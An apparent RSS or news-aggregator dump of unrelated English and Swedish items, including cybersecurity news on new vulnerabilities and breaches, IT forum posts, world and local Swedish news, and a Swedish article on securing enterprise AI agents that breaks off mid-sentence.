CVE-2026-40361 is similar to a vulnerability found a decade ago, BadWinmail, which at the time was dubbed an “enterprise killer”. The post Microsoft Patches Critical Zero-Click Outlook Vulnerability Threatening Enterprises appeared first on SecurityWeek.

Hi guys, our CEO's Outlook App keeps crashing and I don't know what to do more.. This is the situation: he has a Surface, and uses Teams as well as Outlook as desktop app. Teams doesn't crash. His Outlook crashes in office WIFI, as well as when he is at home. He wants to use Outlook as the desktop app and didn't want to use the desktop version as alternative. The app is freezing multiple times a day for about 2 weeks now. The only way to close it is via Task Manager. No new emails load when it happens. Restarting the PC doesn't help. Here's everything I've tried so far: Safe Mode (outlook.exe /safe) – same issue, so no Add-In problem Deleted and rebuilt the .ost file – didn't help Online Repair via Settings → Apps → Outlook → Advanced options → Repair – no change Checked Windows & Office Updates – all uptodate Fully uninstalled Office with Microsoft's SaRA tool and reinstalled fresh – still freezing Checked disk usage in Task Manager – nothing critical Checked free space on C: – enough available Checked RAM usage – looks fine Checked Event Viewer – looks fine Antivirus exclusion for Outlook – tested, no improvement Checked Exchange connection – appears stable System is running Microsoft 365 on Windows. Anyone have any ideas what else could cause this? Could it be hardware related? Thanks in advance! submitted by /u/Bubbly-Conference745 [link] [comments]

Budget carrier HK Express will cut its fuel surcharge on flights departing Hong Kong to overseas destinations by 12.8 per cent from May 16, reducing the fee by HK$50 (US$6.38) to HK$339 per leg, the airline has said. The reduction, revealed on its website on Wednesday, excludes mainland China routes, and follows lower fuel prices amid the Middle East war. The budget carrier of Hong Kong’s Cathay Pacific Airways also said the surcharge for inbound medium-haul journeys, such as those departing...

A critical security flaw has been found in SandboxJS, a widely used JavaScript sandboxing library available on npm. The vulnerability allows attackers to break out of the sandbox entirely and run any code they want directly on the host system. Tracked as CVE-2026-43898, it carries a maximum severity score of 10.0, which is as serious […] The post Critical SandboxJS Escape Vulnerability Enables Host Takeover appeared first on Cyber Security News.

Some European companies operating in China are shifting more production to the country as part of broader supply chain adjustments in response to the US-Israeli war on Iran, according to a new survey by the EU Chamber of Commerce in China. The flash survey of European companies found that more than a quarter of firms had adjusted their supply chain strategies in China following the Middle East conflict, as higher energy and logistics costs weigh on operations. Six in 10 chemicals and petroleum...

10 grader och mulet i Alingsås under eftermiddagen Alingsås Tidning

In the US, fired and laid-off workers often have their digital credentials deactivated before they learn about the loss of their jobs; indeed, the inability to log in to a corporate system may be the first an employee knows of the situation. Although not a generous or humane approach to staff reduction, it does follow from the simple fact that a fired employee with access to company systems is a security risk. Just ask the Akhter twin brothers, accused of wiping out 96 databases hosting US government information in the minutes after both were fired last year from their shared employer. https://arstechnica.com/tech-policy/2026/05/drop-database-what-not-to-do-after-losing-an-it-job/ submitted by /u/Flying-T [link] [comments]

Apple supplier Foxconn has confirmed a cyberattack on several of its U.S. factories, after a ransomware group claimed to have stolen confidential Apple project files as part of the hack. The Nitrogen group posted the breach on its data leak site this week, claiming to have made off with 8TB of data spanning more than 11 million files. Alongside the allegedly stolen Apple files, Nitrogen claims the trove includes internal project documentation and technical drawings tied to Intel, Google, Dell, and Nvidia. Foxconn confirmed the intrusion to The Register on Tuesday, but the supplier did not respond to questions regarding whether any customer data was actually taken. A company spokesperson said its cybersecurity team activated response measures to keep production running, and that all of its affected factories are resuming normal operations. Foxconn assembles a wide range of Apple products, but Apple famously takes the secrecy of unreleased products extremely seriously, and suppliers typically receive only the technical information needed for their specific role in manufacturing. Nitrogen is believed to be an offshoot of leaked Russia-based Conti 2 ransomware code. If so, though, the stolen files may be inaccessible. Researchers at Coveware warned in February that a bug in the group's ESXi encryptor makes file recovery impossible, even for victims who pay up. It's not the first time Foxconn has been targeted by ransomware gangs. The manufacturer was previously hit by LockBit in 2022 and 2024.Tag: FoxconnThis article, "Apple Project Files Allegedly Stolen in Foxconn Ransomware Attack" first appeared on MacRumors.comDiscuss this article in our forums

Discord, the popular instant messaging and VoIP communication platform, announced some significant improvements being made to their Linux client...

Det är bara en dryg månad kvar till midsommar, och hos landets jordgubbsodlare pågår just nu en kamp för att få fram bären i tid. På många håll är våren sen, och det har varit kalla nätter. – Är man inte med med väven en frostnatt går det snett, säger Bitte Wilsson som driver en odling i Axlarp utanför Nässjö.

In addition to FreeBSD 15.1 releasing in the coming weeks, NetBSD 11.0 is also just around the corner as another prominent and major BSD update. NetBSD 11.0-RC4 is now available for last minute testing with this hoping to be the final release candidate...

Lundsbergs marknadschef Christopher Johrin utlovade nolltolerans mot rasism och pennalism när entreprenören och medieprofilen Gunilla von Platen och hennes man övervägde skolan för sin son. Två och ett halvt år senare backade han från sina ord.

På grund av den globala energikrisen föreslår regeringen en extra ändringsbudget på 17,5 miljarder kronor.Det blir bland annat sänkt skatt på bensin och diesel från den 1 juli till sista november om EU:s ministerråd ger klartecken. Stöd riktas också till kollektivtrafiken.Tidöpartierna har övervägt stöd till lantbruket och flyget men nåt sånt har inte presenterats under onsdagen.

Malaysia said on Wednesday it was weighing legal action after Norway blocked the export of missiles ordered for its navy, in a last-minute decision that has dealt a fresh blow to one of the country’s most troubled defence projects. The row centres on the Naval Strike Missile, ordered from Kongsberg Defence and Aerospace for Malaysia’s long-delayed littoral combat ship programme. Government spokesman Fahmi Fadzil said Prime Minister Anwar Ibrahim had raised the matter with his Norwegian...

Depleted US weapons stockpiles as a result of its war in Iran risk eroding Donald Trump’s bargaining power when he meets Xi Jinping in China this week. With Trump on the high-stakes trip is Defence Secretary Pete Hegseth, marking the first time a Pentagon chief has accompanied a president to Beijing in decades. The weapons shortages not only raise questions about US preparedness for war in the Indo-Pacific, but may give Beijing extra leverage because of its control of the supply of critical...

Indonesia, already leading Southeast Asia’s push to keep children off risky digital platforms with an under-16 social media ban, now wants to extend those protections to e-commerce after officials said young people had become victims of online scams and unsupervised digital spending. The plan has drawn support from child psychologists, who warn of impulsive consumption among young users. However, it also presents e-commerce companies with a difficult compliance test: building age-verification...

"I do think it's a really good historical moment for the space industry."

For most people, drinking water is an unremarkable daily habit. In ancient China, however, it carried far greater meaning. Water was bound up with social rank, health beliefs, ritual practice and etiquette. As early as the pre-Qin period (Paleolithic Period – 221 BC), Chinese thinkers were already classifying natural water. The ancient encyclopedic text Master Lü’s Spring and Autumn Annals claimed that “heavy water”, rich in minerals, could cause swelling in the legs and feet, while “light...

Chromium extension swaps promos for John Carpenter-style subliminal slogans

The acclaimed Tudor-set play is co-produced by the Barbie actor, and focuses on working-class women in Essex during the downfall of Anne Boleyn.

Hong Kong’s labour minister has dismissed calls to review the city’s immigration scheme for non-local graduates or tighten talent scheme requirements, despite a sharp decline in entry-level roles, arguing that the workforce is shrinking and the number of local degree holders is insufficient to meet demand. Secretary for Labour and Welfare Chris Sun Yuk-han also said the Employees Retraining Board, which will be rebranded as “Upskill Hong Kong” later this year, could adopt a new focus to help...

KDE today announced a significant investment into the project by Germany's Sovereign Tech Fund. KDE will be receiving €1,285,200 EUR (or roughly 1.5 million USD) over the years 2026 and 2027 to make some significant improvements into their software stack...

Successful exploitation of these flaws could lead to arbitrary code execution and information disclosure. The post Fortinet, Ivanti Patch Critical Vulnerabilities appeared first on SecurityWeek.

Bandet bakom Finlands hittills enda Eurovisionseger gjorde ett starkt intryck på då nioårige André Schultzberg. Snart var tribute-bandet Mini-Lordi, med elever från den sverigefinska språkskolan i Örebro ett faktum. Nu 20 år senare är Eurovision fortfarande en stor del av hans liv.

A new core infrastructure improvement for the Linux kernel on ARM being worked on is enabling 128-bit page table entries (PTEs) with FEAT_D128 as a new optional feature of Armv9.3 and later...

Henderson Land Development secured the first biodiversity loan in Hong Kong, receiving around HK$100 million (US$12.8 million) from HSBC and Hang Seng Bank for green initiatives at Central Yards, the company’s flagship mixed-use development on the New Central Harbourfront. This loan would provide a “scalable blueprint” for companies to achieve their sustainability goals and enhance Hong Kong’s position as a leading international sustainable finance centre, according to the two banks. The...

”Hur går det med din familj? Kom ihåg att jag bara kan hjälpa dem om du samarbetar”, står det i ett SMS som en ukrainsk man i södra Norge fått.Norska säkerhetspolisen, PST, vill öka uppmärksamheten kring fenomenet. De menar att Ryssland kan ha ett intressera av att utföra sabotage mot logistikinfrastruktur kopplat till stödet till Ukraina.Sedan 2022 har cirka 83 000 ukrainare kommit till Norge, varav ungefär 22 000 är från områden som ockuperats av Ryssland. De är särskilt utsatta för påtryckning, eftersom de kan ha familj kvar där.

CEO says there is 'no confusion at all' after cloud-only innovation plan drew flak

Gwanghwamun Square, a plaza in Seoul framed by royal palaces and monuments to Korean national identity, is at the centre of a dispute over whether a massive new Korean war memorial belongs in a public space seen as a major tourist attraction and long associated with civic gatherings and pro-democracy protests. A row of 23 stone monuments representing South Korea and the 22 foreign countries that fought alongside it during the 1950-53 war was recently unveiled at the square. Located across from...

202 kvadratmeter stor villa i Alingsås såld Alingsås Tidning

For years, texting between an iPhone and an Android phone meant your messages traveled without any real privacy protection. That long-standing gap is now being addressed, as Apple and Google have jointly launched a beta rollout of end-to-end encrypted messaging over Rich Communication Services, better known as RCS. Starting May 11, 2026, this milestone update […] The post iOS 26.5 Brings End-to-end Encrypted RCS Messaging Between iPhone and Android appeared first on Cyber Security News.

A 10-year-old girl has told a Hong Kong court that a domestic helper inappropriately touched her when waking her up one morning. Standing trial at Kowloon City Court on Wednesday, helper Lady Jay Santos Flores denied four counts of indecent assault for allegedly molesting the daughters of her former employer in the family’s home between May and June last year. The younger daughter, who was not named in court and testified via video conference, said the 45-year-old helper came to her room on the...

Hus i Nossebro får nya ägare – prislappen: 1 150 000 kronor Alingsås Tidning

Trädet som inspirerade Astrid Lindgren till att bli Pippi Långstrumps sockerdricksträd, har nu fått vaccin mot almsjukan. – Vi hoppas att trädet inte insjuknar, säger arboristen Gabriel Watson.

Senior officials from China and the United States concluded their latest round of trade talks in Seoul after less than four hours on Wednesday, the briefest session since the two countries began holding talks last year. The seventh round of negotiations – led by Chinese Vice-Premier He Lifeng and US Treasury Secretary Scott Bessent – wrapped up just hours ahead of US President Donald Trump’s scheduled arrival in Beijing. The officials ended the session without speaking to the media, a departure...

No summary in RSS payload. Open original transmission for the full article.

Taiwan staged a large-scale live-fire drill on a frontline island near mainland China on Wednesday, hours before President Donald Trump was due to land in Beijing for high-stakes talks with Chinese leader Xi Jinping. The exercise on Kinmen, also known as Quemoy, simulated a People’s Liberation Army amphibious assault on the coastline. The coming Xi-Trump summit has triggered renewed anxiety in Taiwan that it could become a bargaining chip in their broader negotiations, after Trump indicated that...

US President Donald Trump said he would urge China’s Xi Jinping to “open up” to American business, and belatedly added Nvidia’s Jensen Huang to the list of executives accompanying him on a trip to Beijing. “I will be asking President Xi, a Leader of extraordinary distinction, to ‘open up’ China so that these brilliant people can work their magic,” Trump said on social media. “I will make that my very first request.” Huang boarded Air Force One during a refuelling stop in Alaska on Wednesday,...

Umeå kommun har aktiverat stabsläge i äldreomsorgen på grund av personalbrist. I ett utskick till personalen skriver kommunen att verksamheten har en hög belastning.

Halsringarna hittades på en arkeologisk utgrävning i Marby, utanför Norrköping. Fyndet beskrivs som ”unikt” och kan vara en viktig pusselbit för att få större förståelse för bronsåldern.

Article URL: https://vittorioromeo.com/index/blog/refl_enum_to_string.html Comments URL: https://news.ycombinator.com/item?id=48119326 Points: 51 # Comments: 54

Ahead of US President Donald Trump’s state visit, China’s state-controlled media has framed the summit with President Xi Jinping as an opportunity to steer relations towards greater stability and mutual respect, despite grievances and tensions. Xie Feng, China’s ambassador to the US, echoed that message in a wide-ranging Newsweek interview published on the eve of the visit, voicing hope the Beijing meetings would help to manage differences and broaden cooperation along a “steady, sound and...

The two chip giants have published over two dozen advisories describing recently identified security defects. The post Chipmaker Patch Tuesday: Intel and AMD Patch 70 Vulnerabilities appeared first on SecurityWeek.

Leveraging 10G PON, light OTN, and Wi-Fi 7 to modernize infrastructure and reduce operational costs for local operators

The G7 economists’ memo from March and the IMF’s April report on global imbalances arrived at the same prescription: China’s current account surplus is excessive and should be cut by boosting consumption. The diagnosis is wrong. The world economy, especially emerging markets and developing economies, benefits from China’s high saving. A current account surplus is the excess of national saving over domestic investment. The saving is not lost; it is exported abroad in the form of net capital...

Union demands government strips outsourcer of contract after delays, bereavement failures, and data breach

A serious security flaw has been found in Exim, one of the most widely deployed mail transfer agents on the internet today. The vulnerability, tracked as EXIM-Security-2026-05-01.1, allows a remote attacker to corrupt server memory and potentially execute malicious code without needing any special privileges or credentials. It was publicly disclosed on May 12, 2026, […] The post New Exim BDAT GnuTLS Vulnerability Enables Code Execution Attacks appeared first on Cyber Security News.

Empowering operators to move beyond basic connectivity with next-gen AI and ODN systems

The foreign minister says the "distressed" Ghanaians registered with the embassy in Pretoria to be evacuated.

Hong Kong police have arrested a 70-year-old taxi driver after he lost control of his cab and drove onto a pavement in Ngau Tau Kok, killing a woman and badly injuring another. A police spokesman said on Wednesday evening that the driver was arrested for dangerous driving causing death and detained for inquiry. The force earlier said the cabbie and his two passengers were also hurt when the taxi veered onto the pedestrian walkway at about 1.50pm that day on Choi Ha Road, near Chun Wah Road,...

Cybersecurity researchers are calling attention to a new campaign dubbed GemStuffer that has targeted the RubyGems repository with more than 150 gems that use the registry as a data exfiltration channel rather than for malware distribution. "The packages do not appear designed for mass developer compromise," Socket said. "Many have little or no download activity, and the payloads are repetitive,

Trots extrem press har inte Storbritanniens premiärminister Keir Starmer avgått. Under onsdagen skedde ett möte med hälsominister Wes Streeting – som pekats ut som hans utmanare. Några timmar efter mötet kommer uppgifter om att Streeting förbereder sig för att avgå, enligt The Times. Detta för att formellt kunna utmana Starmer.

Android smartphones have become the go-to device for billions of people around the world. From banking and messaging to storing personal photos and sensitive documents, people rely on them for almost everything. That reliance has made mobile devices a prime target for scammers, cybercriminals, and threat actors who constantly evolve their tactics to slip past […] The post Google Enhances Android Mobile Security with New AI-Powered Protections appeared first on Cyber Security News.

En stor sökinsats pågår i Valdemarsvik efter en man som saknats sedan tidiga tisdagskvällen. Polis, hemvärnet och sjöräddningen deltar i sökandet. Inget brott misstänks.

Empowering Brazilian ISPs with next-gen Wi-Fi 7 infrastructure

British Prime Minister Keir Starmer is under pressure to resign after more than 80 lawmakers in his Labour Party said he was not the right person to lead the country and win the ⁠next national election. He has vowed to stay on as no formal ⁠leadership challenge has yet been triggered. If Labour were to choose a new leader, here is ⁠a list of those in the frame to replace Starmer: Wes Streeting, 43 Streeting has served as health and social care minister since Labour came to power in July 2024 – a...

More than 500 packages were pushed during the attack, but the target appears to have been RubyGems itself rather than users. The post Hundreds of Malicious Packages Force RubyGems to Suspend Registrations appeared first on SecurityWeek.

We have put together stories from our coverage on electric and new energy vehicles from the past two weeks to help you stay informed. If you would like to see more of our reporting, please consider subscribing. 1. From Beijing to Berlin: Chinese EVs turn heads as brands eye European markets For German consumer Erik Böhme, a first visit to the Beijing auto show was an eye-opener – the world’s largest car exhibition showcased a vast array of electric vehicle (EV) brands, many already gaining...

That's fine when playing poker, but less useful when we trust LLMs with serious work like finding software flaws

167 kvadratmeter stort hus i Nossebro sålt för 1 150 000 kronor Alingsås Tidning

For decades, the arrival of summer in South Korea was heralded by the rhythmic hum of cicadas and the predictable onset of monsoon season. But as climate change rewrites the country’s seasonal script, the government is bracing for a new reality. On Wednesday, the Korea Meteorological Administration announced a sweeping overhaul of its national weather warning system, the first major restructuring in nearly two decades. The centrepiece of the plan is the introduction of a top-tier “extreme heat...

En stor räddningsinsats pågick utanför Åstön i Timrå kommun efter en båtolycka där två personer hamnat i vattnet. Strax efter 9-tiden hade båda personerna räddats. – Det har gått väl till, de två personerna är nu upplockade, sa sjöräddningsledaren Daniel Åström till SVT.

Hong Kong customs officers have arrested three people in a months-long operation against a money laundering and illicit goods syndicate that led to the discovery of about 2.2 million untaxed cigarettes and HK$11.3 million (US$1.4 million) in alleged criminal proceeds. The Customs and Excise Department said on Wednesday that officers raided five residential flats a day earlier, arresting two men, aged 31 and 37, and a 35-year-old woman on suspicion of money laundering. The department said an...

Article URL: https://sockpuppet.org/blog/2026/05/12/emacsification/ Comments URL: https://news.ycombinator.com/item?id=48118727 Points: 50 # Comments: 6

Mindre hus i Sollebrunn får nya ägare – prislappen: 2 500 000 kronor Alingsås Tidning

Microsoft pushed out a significant cumulative update for Windows 11 on May 12, 2026, covering both version 25H2 and version 24H2. The update, identified as KB5089549, brings OS Builds 26200.8457 and 26100.8457 to users running these versions. It bundles the latest security fixes alongside quality improvements carried over from April’s optional preview release, making it […] The post Microsoft Releases Cumulative Update for Windows 11, Version 25H2 and 24H2 appeared first on Cyber Security News.

Ytterligare två svenskar har satts upp på en ”most wanted”-lista inom Europolinsatsen Grimm, rapporterar Expressen.

The FBI and Chinese police have taken part in a joint operation targeting scam networks in Dubai, in a rare show of cooperation ahead of US President Donald Trump’s visit to China. Dubai Police – which led the operation dubbed Tri-Force Sentinel – said at least nine scam hubs were dismantled and 276 suspects arrested, most of them from Southeast Asia. “The operation delivered a decisive strike against three criminal syndicates and dismantled nine fraud centres behind high-yield investment scams...

fjo3 shares a report from Phys.org: Ever felt like mosquitoes bite you while ignoring everyone else? Scientists are now making progress in deciphering the complex chemical cocktail that makes particular people more enticing to these disease-spreading bloodsuckers. "It's not a misconception -- mosquitoes are attracted to some people more than others," Frederic Simard of France's Institute of Research for Development told AFP. "But we are not all magnets all the time," the medical entomologist added. A range of sensory cues can cause mosquitoes to pick one human over another -- mainly the smell and heat our bodies give off, and the carbon dioxide we exhale. Female mosquitoes -- which are the only ones that bite -- detect these signals with finely tuned receptors, then choose their target accordingly. "We have known for over 100 years that mosquitoes are attracted by the carbon dioxide that we exhale -- this is the first signal that triggers their behavior" when they are dozens of meters away, Swedish scientist Rickard Ignell told AFP. Within around 10 meters, "mosquitoes will start detecting our odor, and in combination with carbon dioxide," this attracts them even more, said the senior author of a recent study on the subject. As they get closer, body temperature and humidity make particular humans even more enticing. [...] For Ignell's recent study, the researchers released Aedes aegypti mosquitoes -- known for spreading yellow fever and dengue -- on 42 women in a lab, to see which ones they preferred. "We have shown that mosquitoes use a blend of odorous compounds (we identified 27 that the mosquitoes will detect, out of the possible 1,000) for their attraction to us," Ignell said. The woman the mosquitoes most liked to bite -- which included pregnant women in their second trimester -- produced a large amount of a particular compound made by a breakdown of the skin oil sebum. That even a small increase of this compound -- called "1-octen-3-ol", or mushroom alcohol -- made a difference came as a surprise, Ignell emphasized. Read more of this story at Slashdot.

Tjädrar i närheten av bygget av kraftledningen till SSAB Oxelösund leder till en försening av jätteprojektet. En överklagan till domstol stoppar projektet på obestämd tid.

Altivio AB – nytt företag startar i Alingsås Alingsås Tidning

42-åring startar ny hotellverksamhet i Alingsås Alingsås Tidning

Google on Tuesday unveiled a new opt-in Android feature called Intrusion Logging for storing forensic logs to better analyze sophisticated spyware attacks. Intrusion Logging, available as part of Advanced Protection Mode, enables "persistent and privacy-preserving forensics logging to allow for investigation of devices in the event of a suspected compromise," the company said. The feature, it

21-åring startar nytt byggföretag i Herrljunga Alingsås Tidning

35-åring startar nytt byggföretag i Alingsås Alingsås Tidning

Singapore will be directly hit by weakened principles in international sea laws as the city state depends on open and secure waterways to maintain its status as a trade hub, Prime Minister Lawrence Wong has warned. He urged cooperation among like-minded countries to uphold and strengthen the framework of international legislation. “As a trading nation, Singapore depends on open and secure sea lanes. International law, including the law of the sea, ensures that vital waterways remain open to all...

South Korea was reviewing a phased contribution to efforts to ensure safe navigation through the Strait of Hormuz, Defence Minister Ahn Gyu-back said on Wednesday, signalling support steps short of military participation. Ahn told a press conference with South Korean reporters in Washington that he had conveyed Seoul’s position at a meeting with US Secretary of Defence Pete Hegseth on Monday. “We said at about this level that, fundamentally, we will participate as a responsible member of the...

[This is a Guest Diary by Joshua Nikolson, an ISC Intern and part of the SANS.edu Bachelor's degree in Applied Cybersecurity (BACS) program.]

A proposal unveiled by Philippine President Ferdinand Marcos Jnr for a new Southeast Asian maritime centre has raised questions about its most glaring obstacle: Manila’s long-standing South China Sea dispute with Beijing. Analysts warn such a centre would not only have to avoid appearance of being an instrument of Philippine interests in disputed waters, but also risks simply duplicating the work of existing regional bodies. Speaking on Friday at a press conference following the Asean summit in...

Where it’s been well and truly forked, seemingly without Microsoft’s code locker noticing

Regeringen vill sänka skatten på bensin och diesel som en del av ett krispaket på 17,5 miljarder. – I den värsta globala energikrisen någonsin måste vi stå på hushållens sida, säger energiminister Ebba Busch (KD). Åtgärden sågas av Miljöpartiet, men S-ledaren Magdalena Andersson säger att de hade gjort samma sak.

Inflationen föll kraftigt till 0,8 procent i april enligt måttet KPIF, visar den definitiva mätningen från Statistiska centralbyrån (SCB). Samtidigt sjönk också matpriserna – kaffe och mejerivaror blev rejält billigare.

Bangladesh’s once-praised family planning system is buckling under severe contraceptive shortages, raising fears of a rise in unplanned pregnancies in one of the world’s most densely populated countries. For decades, the South Asian nation was hailed as a success for slashing birth rates through an expansive state-backed family planning programme that sent field workers door to door with pills, condoms and advice on birth spacing. But that system is now faltering, with government clinics across...

China has sent artificial embryos to its space station to study whether humans could reproduce in zero gravity. The experiment was reported on Tuesday by state broadcaster CCTV. Project leader Yu Leqian said the main goal was to study the impact of gravity – and its absence – on early development, in preparation for eventual human settlement off Earth. Once the impact of the force on embryos was understood, scientists could develop interventions to control its effect, he told CCTV. Yu is a...

Two small counties in China have put in place reciprocal arrangements for their residents to visit tourist spots following a moving story involving people in one place buying the apples of a sick farmer from the other. The story began on May 2 when Ji Yaozhong, a farmer from Yangxian county of northwestern Shaanxi province, drove a truck carrying 4,000kg of apples to sell in Xianfeng county in Hubei province, central China, the Hubei Daily reported. He suffered a sudden stroke which left him...

In 2026, data is the undisputed lifeblood of the modern enterprise. As organizations shift completely to decentralized, multi-cloud architectures, the challenge of securing sensitive information—such as Intellectual Property (IP), Personally Identifiable Information (PII), and Protected Health Information (PHI)—has grown exponentially. It is no longer enough to guard the perimeter against external adversaries; organizations must also […] The post Top 10 Best Data Loss Prevention Software in 2026 appeared first on Cyber Security News.

French President Emmanuel Macron is facing backlash after he interrupted a panel at the Africa Forward Summit in Kenya to demand silence from the audience. Macron stormed the stage to rebuke audience members for what he called a “total lack of respect”, accusing them of disrupting speakers during a presentation by artists and young entrepreneurs. He had earlier described himself as a “Pan-Africanist” during a news conference. The summit is meant to showcase France’s new policy for the continent...

En amerikansk president besöker Kina för första gången på nästan ett årtionde. Fokus för samtalen väntas vara spritt över flera områden – från frågorna om Taiwan och Hormuzsundet, till tre viktiga B:n för USA.

En fransk kvinna är i ett kritiskt tillstånd efter att ha smittats av hantavirus på kryssningsfartyget Hondius. Hon vårdas i Paris – och får hjälp av en artificiell lunga, rapporterar AP. Totalt har elva fall av viruset rapporterats, varav nio är bekräftade. Tre personer har dött.

Class A drugs loaded instead of A4

The biggest tech firms are set to sell millions of smart glasses despite growing privacy concerns.

Alex Batty reveals all about his abduction and life on the run in a new BBC documentary.

Anyone else experiencing an increase of engineers (not juniors that can be potentially forgiven) and Tech Executives use AI like ChatGPT/Claude to troubleshoot a problem and then copy the entire AI answer, not even re-written, just copied then mailing the clients with the AI slob. Then the clients reach out for you to make sense of it just to realize that the AI answer has nothing to do with problem and see the engineer that handled the case has a title that includes either "Senior" or "Chief Exec of..." or similar? We're seeing this more and more and not just in the tech field but everywhere people just shamelessly copy and paste entire emails into GPT, generate an answer and paste the reply directly to the clients. submitted by /u/Askey308 [link] [comments]

IDC uppskattar att det fanns över 28 miljoner AI-agenter i drift vid slutet av förra året och förutspår att det kommer att finnas över 1 miljard aktiva agenter år 2029, som utför 217 miljarder åtgärder per dag. Det är enkelt att bygga en POC för en AI-agent, säger Venkat Achanta, chef för teknik, data och analys på Trans Union, ett globalt kreditinformationsföretag med en omsättning på 4,6 miljarder dollar. Men att styra, säkra och skala upp den är en helt annan utmaning, särskilt för företag i starkt reglerade branscher som finansiella tjänster och hälso- och sjukvård. För att lösa problemet har Trans Union ägnat de senaste tre åren åt att bygga sin agentbaserade AI-plattform, One Tru. Målet var att skapa något som var lika tillförlitligt och deterministiskt som de gamla, skriptbaserade expertsystemen, men lika flexibelt som generativ AI och lika lätt att interagera med som en chattbot. Tricket var dock att kombinera det bästa av två världar genom att använda traditionella system för kärnprocesser där förklarbarhet och tillförlitlighet är avgörande, och att på ett begränsat sätt lägga till generativ AI-funktionalitet för de uppgifter som den var särskilt lämpad för. Eftersom infrastrukturen för detta inte fanns tillgänglig byggde Trans Union sin egen och avsatte 145 miljoner dollar till projektet. Det var en stor investering i en oprövad teknik, men den har redan lett till kostnadsbesparingar på 200 miljoner dollar. Dessutom använde Trans Union plattformen för att bygga kundinriktade lösningar så snart den var klar. I mars i år lanserade Trans Union till exempel sin AI Analytics Orchestrator Agent, som byggts med hjälp av One Tru-plattformen och drivs av Googles Gemini-modeller. Agenten används redan internt av Trans Union för att förbättra analyserna och kan även användas av kunder för att köra sofistikerade dataanalyser utan behov av data scientists. Många kunder använder Trans Unions data men använder inte andra lösningar och plattformar, säger Achanta. Den nya orkestreringsagenten har potential att hjälpa kunderna att få ut mer värde av data och öppna upp nya intäktsströmmar för företaget. Och fler agenter är på gång, säger Achanta. Nyckeln till att få dem att fungera är orkestrerings-, styrnings- och säkerhetslagren. Att bara få en agent att göra något är mycket enkelt för vem som helst, säger han, och kan ta bara några dagar. Företaget kan också skapa agenter snabbt. – Men jag har grunden och skyddsräcken, och agenten som sitter på min plattform använder dem alla, säger han. Det är det som ger oss kraft. Hemligheten bakom att få AI-agenter att uppföra sig är att separera uppgiftens lager och tilldela varje lager till ett annat system, där varje system fungerar under en uppsättning begränsningar. Denna strategi begränsar den skada en enskild agent kan åstadkomma, skapar ett system av kontroller och balanser och begränsar de mest riskfyllda aktiviteterna till en förgenererad AI-teknik. Hos Trans Union sker till exempel det centrala beslutsfattandet genom en uppdaterad version av ett expertsystem. Det fungerar enligt en uppsättning väldefinierade, granskningsbara regler och arbetar förutsägbart, kostnadseffektivt och med låg latens. När det stöter på en situation som det inte har sett tidigare används en LLM för att analysera problemet, en annan agent kan sedan omvandla det till en ny regel, och därefter kan en människa kallas in för att granska resultaten innan den nya regeln läggs till i expertsystemet. Det finns olika agenter som förstår det semantiska lagret, interagerar med människor och utför andra uppgifter. – Med det neurala resonemangslagret – LLM – involverar vi människor i processen, säger han. När det gäller det symboliska resonemangslagret, som är logik- och maskininlärningsdrivet, låter vi det vara automatiserat. Så när varje agent arbetar inom mycket snäva ramar, med endast den begränsade data den behöver för just den uppgiften, och är begränsad till vad den kan göra, blir hela systemet mycket mer hanterbart och tillförlitligt. Det är som skillnaden mellan ett löpande band, där flera arbetare var och en utför en enda, distinkt uppgift, istället för en verkstad där en enda hantverkare gör allt. Löpande bandet kan utföra arbetet snabbare och mer tillförlitligt, men id ag använder många företag sina AI-agenter som om de vore hantverkare. Det senare tillvägagångssättet kan resultera i kreativa, unika produkter, men detta är inte alltid vad ett företag behöver. Nicholas Mattei, ordförande för ACM:s specialintressegrupp för AI och professor vid Tulane University, tycker att företag ska fokusera på att bygga in extra säkerhet vid de punkter där olika delar av agentsystemet ansluter till varandra. – Se till att du har säkerhet i skarvarna, säger han. Om en agent till exempel skickar förfrågningar till en e-posttjänst, ska du sätta upp en kontrollpunkt mellan de två. – Runt luckorna mellan de opålitliga agenterna och där den traditionella programvaran finns, det är där du vill fokusera dina säkerhetsprocesser, säger han. Att bygga en säkerhetsgrund för agentbaserad AI I en Jitterbit-undersökning av 1 500 it-chefer som publicerades i mars är AI-ansvarsfullhet – säkerhet, granskningsbarhet, spårbarhet och skyddsräcken – den viktigaste faktorn när det gäller det slutgiltiga köpbeslutet av AI, före implementeringshastighet, leverantörens rykte och till och med TCO. Säkerhet, styrning och risker för dataintegritet var också de viktigaste frågorna som hindrade AI-initiativ från att gå i produktion, före kostnader och integrationsutmaningar. Och företagen har rätt att vara oroliga. Tidigare i år lyckades forskare vid cybersäkerhetsföretaget Code Wall bryta sig in i McKinseys nya AI-plattform, Lilli. Med hjälp av ett eget AI-verktyg uppgav forskarna att de kunde få tillgång till 47 miljoner chattmeddelanden, 728 000 filer, 384 000 AI-assistenter, 94 000 arbetsytor, 217 000 agentmeddelanden, nästan 4 miljoner RAG-dokumentbitar samt 95 systemprompter och AI-modellkonfigurationer. ”Det här är årtionden av McKinseys egen forskning, ramverk och metoder – företagets intellektuella kronjuveler som ligger i en databas som vem som helst kan läsa”, skrev forskarna. Anledningen? Av över 200 offentligt exponerade API-ändpunkter krävde 22 ingen autentisering. Det tog bara två timmar för forskarna att få fullständig läs- och skrivåtkomst till Lillis hela produktionsdatabas. McKinsey reagerade snabbt på larmet, åtgärdade de oautentiserade ändpunkterna och vidtog andra säkerhetsåtgärder. “Vår utredning, som stöddes av ett ledande externt forensikföretag, fann inga bevis för att kunddata eller konfidentiell kundinformation hade kommit i händerna på denna forskare eller någon annan obehörig tredje part”, sa företaget i ett uttalande. IDC säger att incidenten understryker hur farligt ett intrång i ett AI-system kan vara för ett företag. – De flesta företag tänker fortfarande på AI-risker i gårdagens termer: dataläckage, felaktiga resultat och skada på varumärkets rykte, säger Alessandro Perilli, IDC:s vice vd för AI-forskning. Det är allvarliga problem, men den större risken blir att delegera befogenheter till AI-system. Genom att få tillgång till en agentbaserad AI-plattform kan en angripare inte bara se något de inte ska se, utan också i hemlighet ändra hur företaget agerar. Och att säkra agentbaserade AI-system i företagsstorlek som Lilli är bara halva utmaningen. Enligt Gartner misstänker 69 procent av organisationerna att anställda använder förbjudna AI-verktyg, och 40 procent kommer att drabbas av säkerhets- eller efterlevnadsincidenter fram till 2030 som en följd av detta. Men de tillgängliga upptäcktsverktygen är inte helt redo att hitta AI-agenter, säger Gartner. – Om jag frågade dig hur många agenter som körs i ditt företag just nu, var skulle du gå för att kolla upp det?, frågar Swaminathan Chandrasekaran, global chef för AI- och datalaboratorier på KPMG, som nu har flera tusen AI-agenter i produktion. – 